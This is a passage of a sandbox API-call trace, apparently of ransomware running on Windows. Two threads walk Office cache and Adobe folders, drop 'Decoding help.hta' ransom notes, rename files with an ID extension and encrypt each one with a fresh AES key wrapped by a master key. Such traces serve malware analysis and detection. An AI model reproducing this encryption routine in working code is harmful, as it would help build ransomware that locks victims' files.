lpString2="..") returned -1 [0041.759] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.759] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0041.759] lstrcmpW (lpString1=".", lpString2="Proof.en") returned -1 [0041.759] lstrcmpW (lpString1="..", lpString2="Proof.en") returned -1 [0041.759] lstrcmpiW (lpString1="windows", lpString2="Proof.en") returned 1 [0041.759] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" [0041.759] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.759] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proof.en" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en" [0041.759] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*.*" [0041.759] GlobalMemoryStatus (in: lpBuffer=0x358fd10 | out: lpBuffer=0x358fd10) [0041.759] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41602b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c4 [0041.760] CloseHandle (hObject=0x2c4) returned 1 [0041.760] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0041.760] lstrcmpW (lpString1=".", lpString2="Proof.es") returned -1 [0041.760] lstrcmpW (lpString1="..", lpString2="Proof.es") returned -1 [0041.760] lstrcmpiW (lpString1="windows", lpString2="Proof.es") returned 1 [0041.760] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" [0041.760] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.760] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proof.es" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es" [0041.760] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*" [0041.760] GlobalMemoryStatus (in: lpBuffer=0x358fd10 | out: lpBuffer=0x358fd10) [0041.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3398180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c4 [0041.761] CloseHandle (hObject=0x2c4) returned 1 [0041.761] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0041.761] lstrcmpW (lpString1=".", lpString2="Proof.fr") returned -1 [0041.761] lstrcmpW (lpString1="..", lpString2="Proof.fr") returned -1 [0041.761] lstrcmpiW (lpString1="windows", lpString2="Proof.fr") returned 1 [0041.761] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" [0041.761] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.761] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proof.fr" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr" [0041.761] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*" [0041.762] GlobalMemoryStatus (in: lpBuffer=0x358fd10 | out: lpBuffer=0x358fd10) [0041.762] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3410388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c4 [0041.762] CloseHandle (hObject=0x2c4) returned 1 [0041.762] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0041.762] lstrcpyW (in: lpString1=0x10ba6450, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" [0041.762] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.762] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.762] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.762] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0041.763] WriteFile (in: hFile=0x2c4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x358fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x358fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.764] CloseHandle (hObject=0x2c4) returned 1 [0041.764] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.765] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Proofing.msi") returned -1 [0041.765] lstrlenW (lpString="Proofing.msi") returned 12 [0041.765] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" [0041.765] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.765] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proofing.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" [0041.765] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" [0041.765] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0041.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.765] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0041.766] CreateFileMappingA (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x2c0 [0041.766] CryptAcquireContextA (in: phProv=0x358fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x358fcec*=0x3448e90) returned 1 [0044.936] CryptGenKey (in: hProv=0x3448e90, Algid=0x6610, dwFlags=0x1, phKey=0x358fce8 | out: phKey=0x358fce8*=0x5d8150) returned 1 [0044.936] CryptExportKey (in: hKey=0x5d8150, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x358fbe4, pdwDataLen=0x358fce4 | out: pbData=0x358fbe4*, pdwDataLen=0x358fce4*=0x2c) returned 1 [0044.937] MapViewOfFile (hFileMappingObject=0x2c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd4200) returned 0x13560000 [0044.949] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x358fbe4*, pdwDataLen=0x358fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x358fbe4*, pdwDataLen=0x358fcf8*=0x100) returned 1 [0044.949] CryptEncrypt (in: hKey=0x5d8150, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x13560000, pdwDataLen=0x358fce4*=0xd4200, dwBufLen=0xd4200 | out: pbData=0x13560000*, pdwDataLen=0x358fce4*=0xd4200) returned 1 [0045.302] UnmapViewOfFile (lpBaseAddress=0x13560000) returned 1 [0047.502] CloseHandle (hObject=0x2c0) returned 1 [0047.502] CryptDestroyKey (hKey=0x5d8150) returned 1 [0047.502] CryptReleaseContext (hProv=0x3448e90, dwFlags=0x0) returned 1 [0047.502] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.502] WriteFile (in: hFile=0x2c4, lpBuffer=0x358fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x358fcf8, lpOverlapped=0x0 | out: lpBuffer=0x358fbe4*, lpNumberOfBytesWritten=0x358fcf8*=0x100, lpOverlapped=0x0) returned 1 [0049.453] WriteFile (in: hFile=0x2c4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x358fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x358fcf8*=0x500, lpOverlapped=0x0) returned 1 [0049.453] CloseHandle (hObject=0x2c4) returned 1 [0050.414] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.659] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.xml", cAlternateFileName="")) returned 1 [0053.659] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" [0053.659] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0053.659] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0053.659] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0053.659] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Proofing.xml") returned -1 [0053.659] lstrlenW (lpString="Proofing.xml") returned 12 [0053.659] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*" [0053.659] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0053.659] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proofing.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" [0053.659] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" [0053.659] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.576] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x990 [0057.576] CreateFileMappingA (hFile=0x990, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x994 [0057.576] CryptAcquireContextA (in: phProv=0x358fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x358fcec*=0x34488b8) returned 1 [0060.168] CryptGenKey (in: hProv=0x34488b8, Algid=0x6610, dwFlags=0x1, phKey=0x358fce8 | out: phKey=0x358fce8*=0x671370) returned 1 [0060.168] CryptExportKey (in: hKey=0x671370, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x358fbe4, pdwDataLen=0x358fce4 | out: pbData=0x358fbe4*, pdwDataLen=0x358fce4*=0x2c) returned 1 [0060.168] MapViewOfFile (hFileMappingObject=0x994, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x550000 [0063.792] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x358fbe4*, pdwDataLen=0x358fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x358fbe4*, pdwDataLen=0x358fcf8*=0x100) returned 1 [0063.792] CryptEncrypt (in: hKey=0x671370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000*, pdwDataLen=0x358fce4*=0x320, dwBufLen=0x320 | out: pbData=0x550000*, pdwDataLen=0x358fce4*=0x320) returned 1 [0063.793] UnmapViewOfFile (lpBaseAddress=0x550000) Thread: id = 123 os_tid = 0x570 [0040.156] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*", lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a56f0 [0040.156] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.156] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.156] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.156] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.156] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf1a9e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf1a9e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0040.156] lstrcmpW (lpString1=".", lpString2="Acrobat") returned -1 [0040.156] lstrcmpW (lpString1="..", lpString2="Acrobat") returned -1 [0040.156] lstrcmpiW (lpString1="windows", lpString2="Acrobat") returned 1 [0040.156] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*" [0040.156] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*") returned 49 [0040.156] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\", lpString2="Acrobat" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat" [0040.156] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\*.*" [0040.156] GlobalMemoryStatus (in: lpBuffer=0xb40fd10 | out: lpBuffer=0xb40fd10) [0040.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9478660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x230 [0040.157] CloseHandle (hObject=0x230) returned 1 [0040.157] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0040.157] lstrcmpW (lpString1=".", lpString2="ARM") returned -1 [0040.157] lstrcmpW (lpString1="..", lpString2="ARM") returned -1 [0040.157] lstrcmpiW (lpString1="windows", lpString2="ARM") returned 1 [0040.159] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*" [0040.159] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*") returned 49 [0040.159] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\", lpString2="ARM" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM" [0040.159] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*.*" [0040.159] GlobalMemoryStatus (in: lpBuffer=0xb40fd10 | out: lpBuffer=0xb40fd10) [0040.159] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10bae458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x230 [0040.160] 